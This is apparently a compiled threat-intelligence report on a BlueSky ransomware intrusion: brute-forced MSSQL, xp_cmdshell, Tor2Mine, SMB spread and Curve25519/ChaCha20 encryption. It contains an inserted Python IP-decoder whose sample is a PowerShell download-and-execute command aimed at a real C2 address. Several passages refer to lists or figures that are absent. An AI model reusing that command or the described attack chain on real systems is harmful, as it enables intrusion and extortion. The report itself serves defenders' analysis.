In December 2022, we observed an intrusion on a public-facing MSSQL Server, which resulted in the deployment of BlueSky ransomware. First discovered in June 2022, BlueSky ransomware has code links to Conti and Babuk ransomware.
While other reports point to malware downloads as initial access, in this report the threat actors gained access via an MSSQL brute-force attack. They then leveraged Cobalt Strike and Tor2Mine to perform post-exploitation activities. Within one hour of the threat actors accessing the network, they deployed BlueSky ransomware network wide.
The PowerShell session was then seen making a connection to a Tor2Mine stager server. This was followed by execution of a PowerShell script which performed a variety of operations, such as checking the privileges of the active user, disabling AV solutions, and dropping a miner payload named java.exe. Tor2Mine is a Monero-mining campaign that is based on XMRigCC. Depending on the privileges of the user, the script also creates scheduled tasks and Windows services to maintain persistence on the host.
Around 15 minutes after initial access, the threat actors moved laterally toward domain controllers and file shares using remote service creation. These services were used to execute the same PowerShell commands and to download and execute the Tor2Mine malware. Upon establishing access to one of the domain controllers, the threat actors performed activity similar to that observed on the beachhead.
Roughly 30 minutes after initial access, the BlueSky ransomware binary was dropped and executed on the beachhead. The execution worked as intended, and the ransomware spread to all devices in the network over SMB. The time to ransomware in this case was 32 minutes.
The Cobalt Strike server observed in this intrusion was first seen on December 16th 2022 and remained active through January 17th 2023. We saw the server return for a second time frame from April 6th 2023 through April 15th 2023. This data was provided via the Threat Intel tracking services of The DFIR Report.
We offer multiple services including a Threat Feed service which tracks Command and Control frameworks such as Cobalt Strike, Sliver, BianLian, Metasploit, Empire, Havoc, etc. More information on this service can be found here.
In the next attack stage, the threat actors established a command shell via the Extended SQL Stored Procedure xp_cmdshell. This stored procedure allows operating system commands to be issued directly to the Windows command shell. To do this, they enabled the feature in the MSSQL configuration:
Tor2Mine uses a PowerShell script, checking.ps1, to perform a variety of operations. In its first few lines, the script sets two variables, $priv and $osver, to check whether the active user is an administrator and to record the operating system version, respectively.
To establish persistence in the network, multiple scheduled tasks and Windows services were created on the beachhead and one of the domain controllers. They reference the files dropped on the compromised hosts and Tor2Mine servers.
During the intrusion the threat actor deployed the XMRig miner, which loaded the driver WinRing0. This driver is deployed to assist the miner's operations and has been in use since at least version 5.3.0.
In the script checking.ps1 the threat actor created 16 different tasks on the hosts where Tor2Mine was deployed. These tasks were named to blend in with the legitimate Windows tasks present on the hosts:
During the course of the intrusion, we observed port discovery (port 445) activity from the beachhead. We attribute this to the invocation of the PowerShell command Invoke-SMBExec. This was likely executed as part of the Invoke-TheHash framework based on other PowerShell modules observed.
Decoding the command, we can see the same PowerShell download and execute as observed on the beachhead. The hexadecimal value 0x53611451 corresponds to the IP address 83.97.20[.]81, which was the command and control server for the Tor2Mine malware.
The BlueSky ransomware binary, named vmware.exe, was dropped on the beachhead and, upon execution, resulted in network-wide ransomware. This was accomplished using SMB, with the ransomware connecting to hosts over port 445 to encrypt files.
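A small analyst helper, added here and not part of the original report, that recovers dotted-quad addresses from integer-encoded literals in a command line. The sample command is constructed for illustration (its script path is a placeholder, and the exact PowerShell construct used in the intrusion is not reproduced), so both byte-order readings are returned; the page's 0x53611451 is the big-endian one.

```python
import re
import struct
from typing import Dict, List


def int_to_ipv4(value: int) -> Dict[str, str]:
    """Both byte-order readings of a 32-bit integer as dotted quads.
    0x53611451 reads 83.97.20.81 big-endian (the page's value); the
    little-endian reading is kept because some casts reverse the order."""
    if not 0 <= value <= 0xFFFFFFFF:
        raise ValueError("not a 32-bit value")
    be = struct.pack(">I", value)
    return {"big_endian": ".".join(str(b) for b in be),
            "little_endian": ".".join(str(b) for b in be[::-1])}


# Hex literals of 7-8 digits (a leading zero may be dropped) and "dotless"
# decimal literals in the 32-bit range: two common ways to hide an IP.
_HEX = re.compile(r"\b0x([0-9a-fA-F]{7,8})\b")
_DEC = re.compile(r"\b(\d{8,10})\b")


def find_encoded_ips(command: str) -> List[dict]:
    """Scan a command line and return every candidate encoded IPv4 address."""
    hits = []
    for m in _HEX.finditer(command):
        hits.append({"literal": m.group(0), **int_to_ipv4(int(m.group(1), 16))})
    for m in _DEC.finditer(command):
        n = int(m.group(1))
        if 0x01000000 <= n <= 0xFFFFFFFF:   # ignore values below 1.0.0.0
            hits.append({"literal": m.group(0), **int_to_ipv4(n)})
    return hits


# Constructed sample in the spirit of the download-and-execute command the
# report describes; the script path is a placeholder and the exact PowerShell
# construct used in the intrusion is not reproduced.
SAMPLE_COMMAND = ("powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                  ".DownloadString('http://' + 0x53611451 + '/PLACEHOLDER.ps1')\"")

if __name__ == "__main__":
    for hit in find_encoded_ips(SAMPLE_COMMAND):
        print(hit)
```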
BlueSky ransomware is an emerging threat that researchers have been paying increasing attention to since its initial discovery in late June 2022. The ransomware has been observed being spread via trojanized downloads from questionable websites as well as in phishing emails.
Upon infection, BlueSky uses fast encryption techniques to rapidly process files on the target and connected hosts. The ransomware has the ability to move laterally via SMB and has been observed doing so in Active Directory environments. Encrypted files will be marked with the .bluesky extension. Victims are instructed to contact the attackers via a Tor-based portal to obtain a decrypter.
The first stage of a BlueSky ransomware infection involves a compressed, base64-encoded PowerShell script, start.ps1. On execution, the script produces a further PowerShell script, stage.ps1. If stage.ps1 is run without administrator privileges, it first seeks to elevate privileges through CVE-2021-1732 or CVE-2022-21882.
Setting ThreadInformationClass to the value 0x11 prevents certain thread events from being viewed or hooked by debuggers, or from being detected by certain EDR hooking mechanisms. As noted by Unit42, BlueSky uses a multithreaded queue for faster encryption.
Previous researchers have noted that file targeting is inverted compared to typical ransomware behavior: rather than targeting specific file extensions, BlueSky instead lists file types to be excluded from encryption. The following extensions are reportedly excluded:
BlueSky ransomware has the ability to rapidly encrypt the local host and move laterally by exploiting known vulnerabilities. BlueSky campaigns appear to be in their infancy, but the architecture of both droppers and payloads indicates that the actors have invested significant effort and will be looking to reap the returns. Now is the time for security teams to get ahead by bolstering their protection and detection posture.
Based on the information available, it seems that BlueSky Ransomware hasn't shared any stolen data with the public yet. Also, the Bitcoin wallets linked to BlueSky Ransomware samples haven't been used for any transactions. This suggests that this threat is still in its infancy.
Although infection rates are currently minimal, the ransomware's characteristics, which are detailed below, suggest it has been meticulously crafted for a sustained operational campaign. In this post, we delve into the latest intelligence regarding BlueSky ransomware to aid security teams in bolstering their defenses against this emerging threat.
Significantly, before dropping the final BlueSky payload, the PowerShell dropper determines if it is being executed as a privileged user. If so, it moves to the next step and downloads and executes the ransomware payload. If not, it uses the following techniques to escalate local privileges, depending on the version of the host operating system. If the version of the host operating system is earlier than Windows 10, such as Windows 7, 8 or XP, then the script will download and execute a modified version of the local privilege escalation tool called JuicyPotato. If the host is running Windows 10 or later, then the script will download and execute ghost.exe and spooler.exe to exploit local privilege escalation vulnerabilities CVE-2020-0796 and CVE-2021-1732, respectively.
The vulnerabilities exploited to gain privileges are listed below.
After gaining additional privileges, the PowerShell dropper downloads the final BlueSky ransomware payload from hxxps://kmsauto[.]us/someone/I.exe and saves it locally to the filesystem as javaw.exe, attempting to masquerade as a legitimate Windows application. Eventually, the sample executes from the file path
BlueSky drops the ransom note as a text file named # DECRYPT FILES BLUESKY #.txt and an HTML file named # DECRYPT FILES BLUESKY #.html in each local directory where it has successfully encrypted files and renamed them with the file extension .bluesky. The content of these two files is shown below.
File encryption limitations: Unlike other ransomware, which normally carries a list of file extensions to identify files eligible for encryption, BlueSky carries a list of extensions that are excluded from the file encryption process.
BlueSky ransomware uses a multithreaded queue for the encryption process. It starts multiple threads: one responsible for file encryption, another for enumerating files on the local file system and mounted network shares and adding them to the queue. The flow chart below illustrates this.
The file encryption of BlueSky ransomware is similar to that of Babuk ransomware: both use Curve25519 to generate a public key for the host and derive a shared key from the attacker's public key. After generating an elliptic curve key pair, BlueSky computes a hash of the shared key and uses it to generate a file encryption key for the ChaCha20 algorithm. Finally, it reads the file buffer, encrypts it with ChaCha20 and replaces the contents of the original file.
T1140 - Deobfuscate/Decode Files or Information: The BlueSky downloader base64-decodes and decompresses data to unpack the next-stage payload. The BlueSky ransomware payload encrypts the ransom note with RC4-based encryption, and it uses a custom encryption scheme to encrypt embedded strings.
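The Curve25519 key agreement behind the scheme just described, as an added example (a pure-Python X25519 per RFC 7748, not BlueSky's or Babuk's own code) showing why only the holder of the attacker's private key can re-derive the per-victim file key. The key pairs are generated here for the demonstration, SHA-256 is assumed as the hash of the shared key because the page does not name the hash, and the attacker-side recomputation from the host's public key is the standard Babuk-style recovery path assumed here; ChaCha20 file encryption itself is not shown.

```python
import hashlib
import os

P = 2**255 - 19                          # Curve25519 field prime
A24 = 121665                             # (486662 - 2) / 4, Montgomery ladder constant
BASEPOINT = (9).to_bytes(32, "little")   # standard X25519 generator u = 9


def x25519(scalar: bytes, point: bytes) -> bytes:
    """RFC 7748 X25519: scalar * point on the u-coordinate via the Montgomery
    ladder. The branch on `swap` is not constant-time; fine for illustration."""
    k = bytearray(scalar)
    k[0] &= 248; k[31] &= 127; k[31] |= 64   # clamp the private scalar
    k = int.from_bytes(k, "little")
    x1 = int.from_bytes(point, "little") & ((1 << 255) - 1)
    x2, z2, x3, z3, swap = 1, 0, x1, 1, 0
    for t in range(254, -1, -1):
        kt = (k >> t) & 1
        swap ^= kt
        if swap:
            x2, x3, z2, z3 = x3, x2, z3, z2
        swap = kt
        a, b = (x2 + z2) % P, (x2 - z2) % P
        aa, bb = a * a % P, b * b % P
        e = (aa - bb) % P
        c, d = (x3 + z3) % P, (x3 - z3) % P
        da, cb = d * a % P, c * b % P
        x3, z3 = (da + cb) ** 2 % P, x1 * (da - cb) ** 2 % P
        x2, z2 = aa * bb % P, e * (aa + A24 * e) % P
    if swap:
        x2, x3, z2, z3 = x3, x2, z3, z2
    return (x2 * pow(z2, P - 2, P) % P).to_bytes(32, "little")


def keypair(priv: bytes = None):
    priv = priv or os.urandom(32)
    return priv, x25519(priv, BASEPOINT)


def derive_file_key(shared: bytes) -> bytes:
    # The page says the shared key is hashed to obtain the ChaCha20 key;
    # SHA-256 is an assumption, the page does not name the hash function.
    return hashlib.sha256(shared).digest()


def simulate_exchange(attacker_priv: bytes = None) -> bool:
    """Victim side: fresh pair plus the attacker public key embedded in the binary.
    Attacker side: own private key plus the victim's public key, nothing else."""
    atk_priv, atk_pub = keypair(attacker_priv)   # only atk_pub ships with the payload
    host_priv, host_pub = keypair()              # per-victim pair generated at run time
    victim_key = derive_file_key(x25519(host_priv, atk_pub))
    recovered = derive_file_key(x25519(atk_priv, host_pub))
    return victim_key == recovered
```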
Cyber criminals behind ransomware attacks are continuously adapting to advanced tactics, making it increasingly challenging for cybersecurity defenses to thwart their activities. These evolving techniques encompass encoding and encrypting malicious code, along with the implementation of multi-staged payload delivery methods. Notably, the BlueSky ransomware strain demonstrates exceptional proficiency by swiftly encrypting files on victim machines using multi-threaded processing capabilities. Furthermore, it employs obfuscation strategies, such as API hashing, to impede reverse engineering efforts by security analysts.